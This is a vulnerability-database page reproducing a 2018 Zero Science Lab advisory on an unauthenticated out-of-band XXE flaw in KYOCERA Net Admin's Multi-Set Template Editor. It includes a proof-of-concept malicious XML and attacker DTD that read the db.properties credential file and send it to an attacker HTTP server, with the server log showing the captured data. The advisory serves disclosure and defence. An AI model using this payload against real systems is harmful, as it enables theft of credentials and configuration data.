Vulners
Lucene search
KYOCERA Multi-Set Template Editor 3.4 Out-Of-Band XML External Entity Injection
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
 | KYOCERA Net Admin 安全漏洞 | 24 Dec 202500:00 | – | cnnvd |
 | CVE-2019-25253 | 24 Dec 202519:28 | – | cve |
 | CVE-2019-25253 KYOCERA Net Admin 3.4.0906 Unauthenticated XML External Entity Injection | 24 Dec 202519:28 | – | cvelist |
 | EUVD-2025-205299 | 24 Dec 202521:30 | – | euvd |
 | CVE-2019-25253 | 24 Dec 202520:15 | – | nvd |
 | PT-2025-53339 | 24 Dec 202500:00 | – | ptsecurity |
 | CVE-2019-25253 KYOCERA Net Admin 3.4.0906 Unauthenticated XML External Entity Injection | 24 Dec 202519:28 | – | vulnrichment |
<html><body><p>KYOCERA Multi-Set Template Editor 3.4 Out-Of-Band XML External Entity Injection
Vendor: KYOCERA Corporation
Product https://global.kyocera.com
Affected version: 3.4.0906
Summary: KYOCERA Net Admin is Kyocera's unified
device management software that uses a web-based
platform to give network administrators easy and
uncomplicated control to handle a fleet for up to
10,000 devices. Tasks that used to require multiple
programs or walking to each printer can now be
accomplished in a single, fast and modern environment.
Desc: KYOCERA Multi-Set Template Editor (part of Net
Admin) suffers from an unauthenticated XML External Entity
(XXE) injection vulnerability using the DTD parameter
entities technique resulting in disclosure and retrieval
of arbitrary data from the affected node via out-of-band
(OOB) channel attack. The vulnerability is triggered when
input passed to the Multi-Set Template Editor (kmmted.exe)
called by the ActiveX DLL MultisetTemplateEditorActiveXComponent.dll
is not sanitized while parsing a 5.x Multi-Set template XML
file.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Apache Tomcat/8.5.15
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5459
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5459.php
28.03.2018
---
Malicious.xml:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE ZSL>
%remote;
%root;
%oob;]>
Attacker's xxe.xml:
<!ENTITY % fetch SYSTEM "file:///C:\Program Files\Kyocera\NetAdmin\Admin\conf\db.properties">
<!ENTITY % root "<!ENTITY % oob SYSTEM 'http://192.168.1.71:7777/?%fetch;'> ">
Data retrieval:
lqwrm@metalgear:~$ python -m SimpleHTTPServer 7777
Serving HTTP on 0.0.0.0 port 7777 ...
192.168.1.71 - - [01/Apr/2018 14:36:15] "GET /xxe.xml HTTP/1.1" 200 -
192.168.1.71 - - [01/Apr/2018 14:36:15] "GET /?db_host=localhost%0D%0Adb_port=5432%0D%0Adb_name=KNETADMINDB%0D%0Adb_driver=pgsql%0D%0Adb_user=postgres%0D%0Adb_password=ENC(4YMilUUDS80QB5rD+Rhn1z89rNXQXxcw)%0D%0Adb_driverClassName=org.postgresql.Driver%0D%0Adb_url=jdbc:postgresql://localhost/KNETADMINDB%0D%0Adb_initialSize=1%0D%0Adb_maxActive=20%0D%0Adb_dialect=org.hibernate.dialect.PostgreSQLDialect HTTP/1.1" 200 -
</p></body></html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Apr 2018 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 47.1
CVSS 3.17.5
EPSS0.00019
SSVC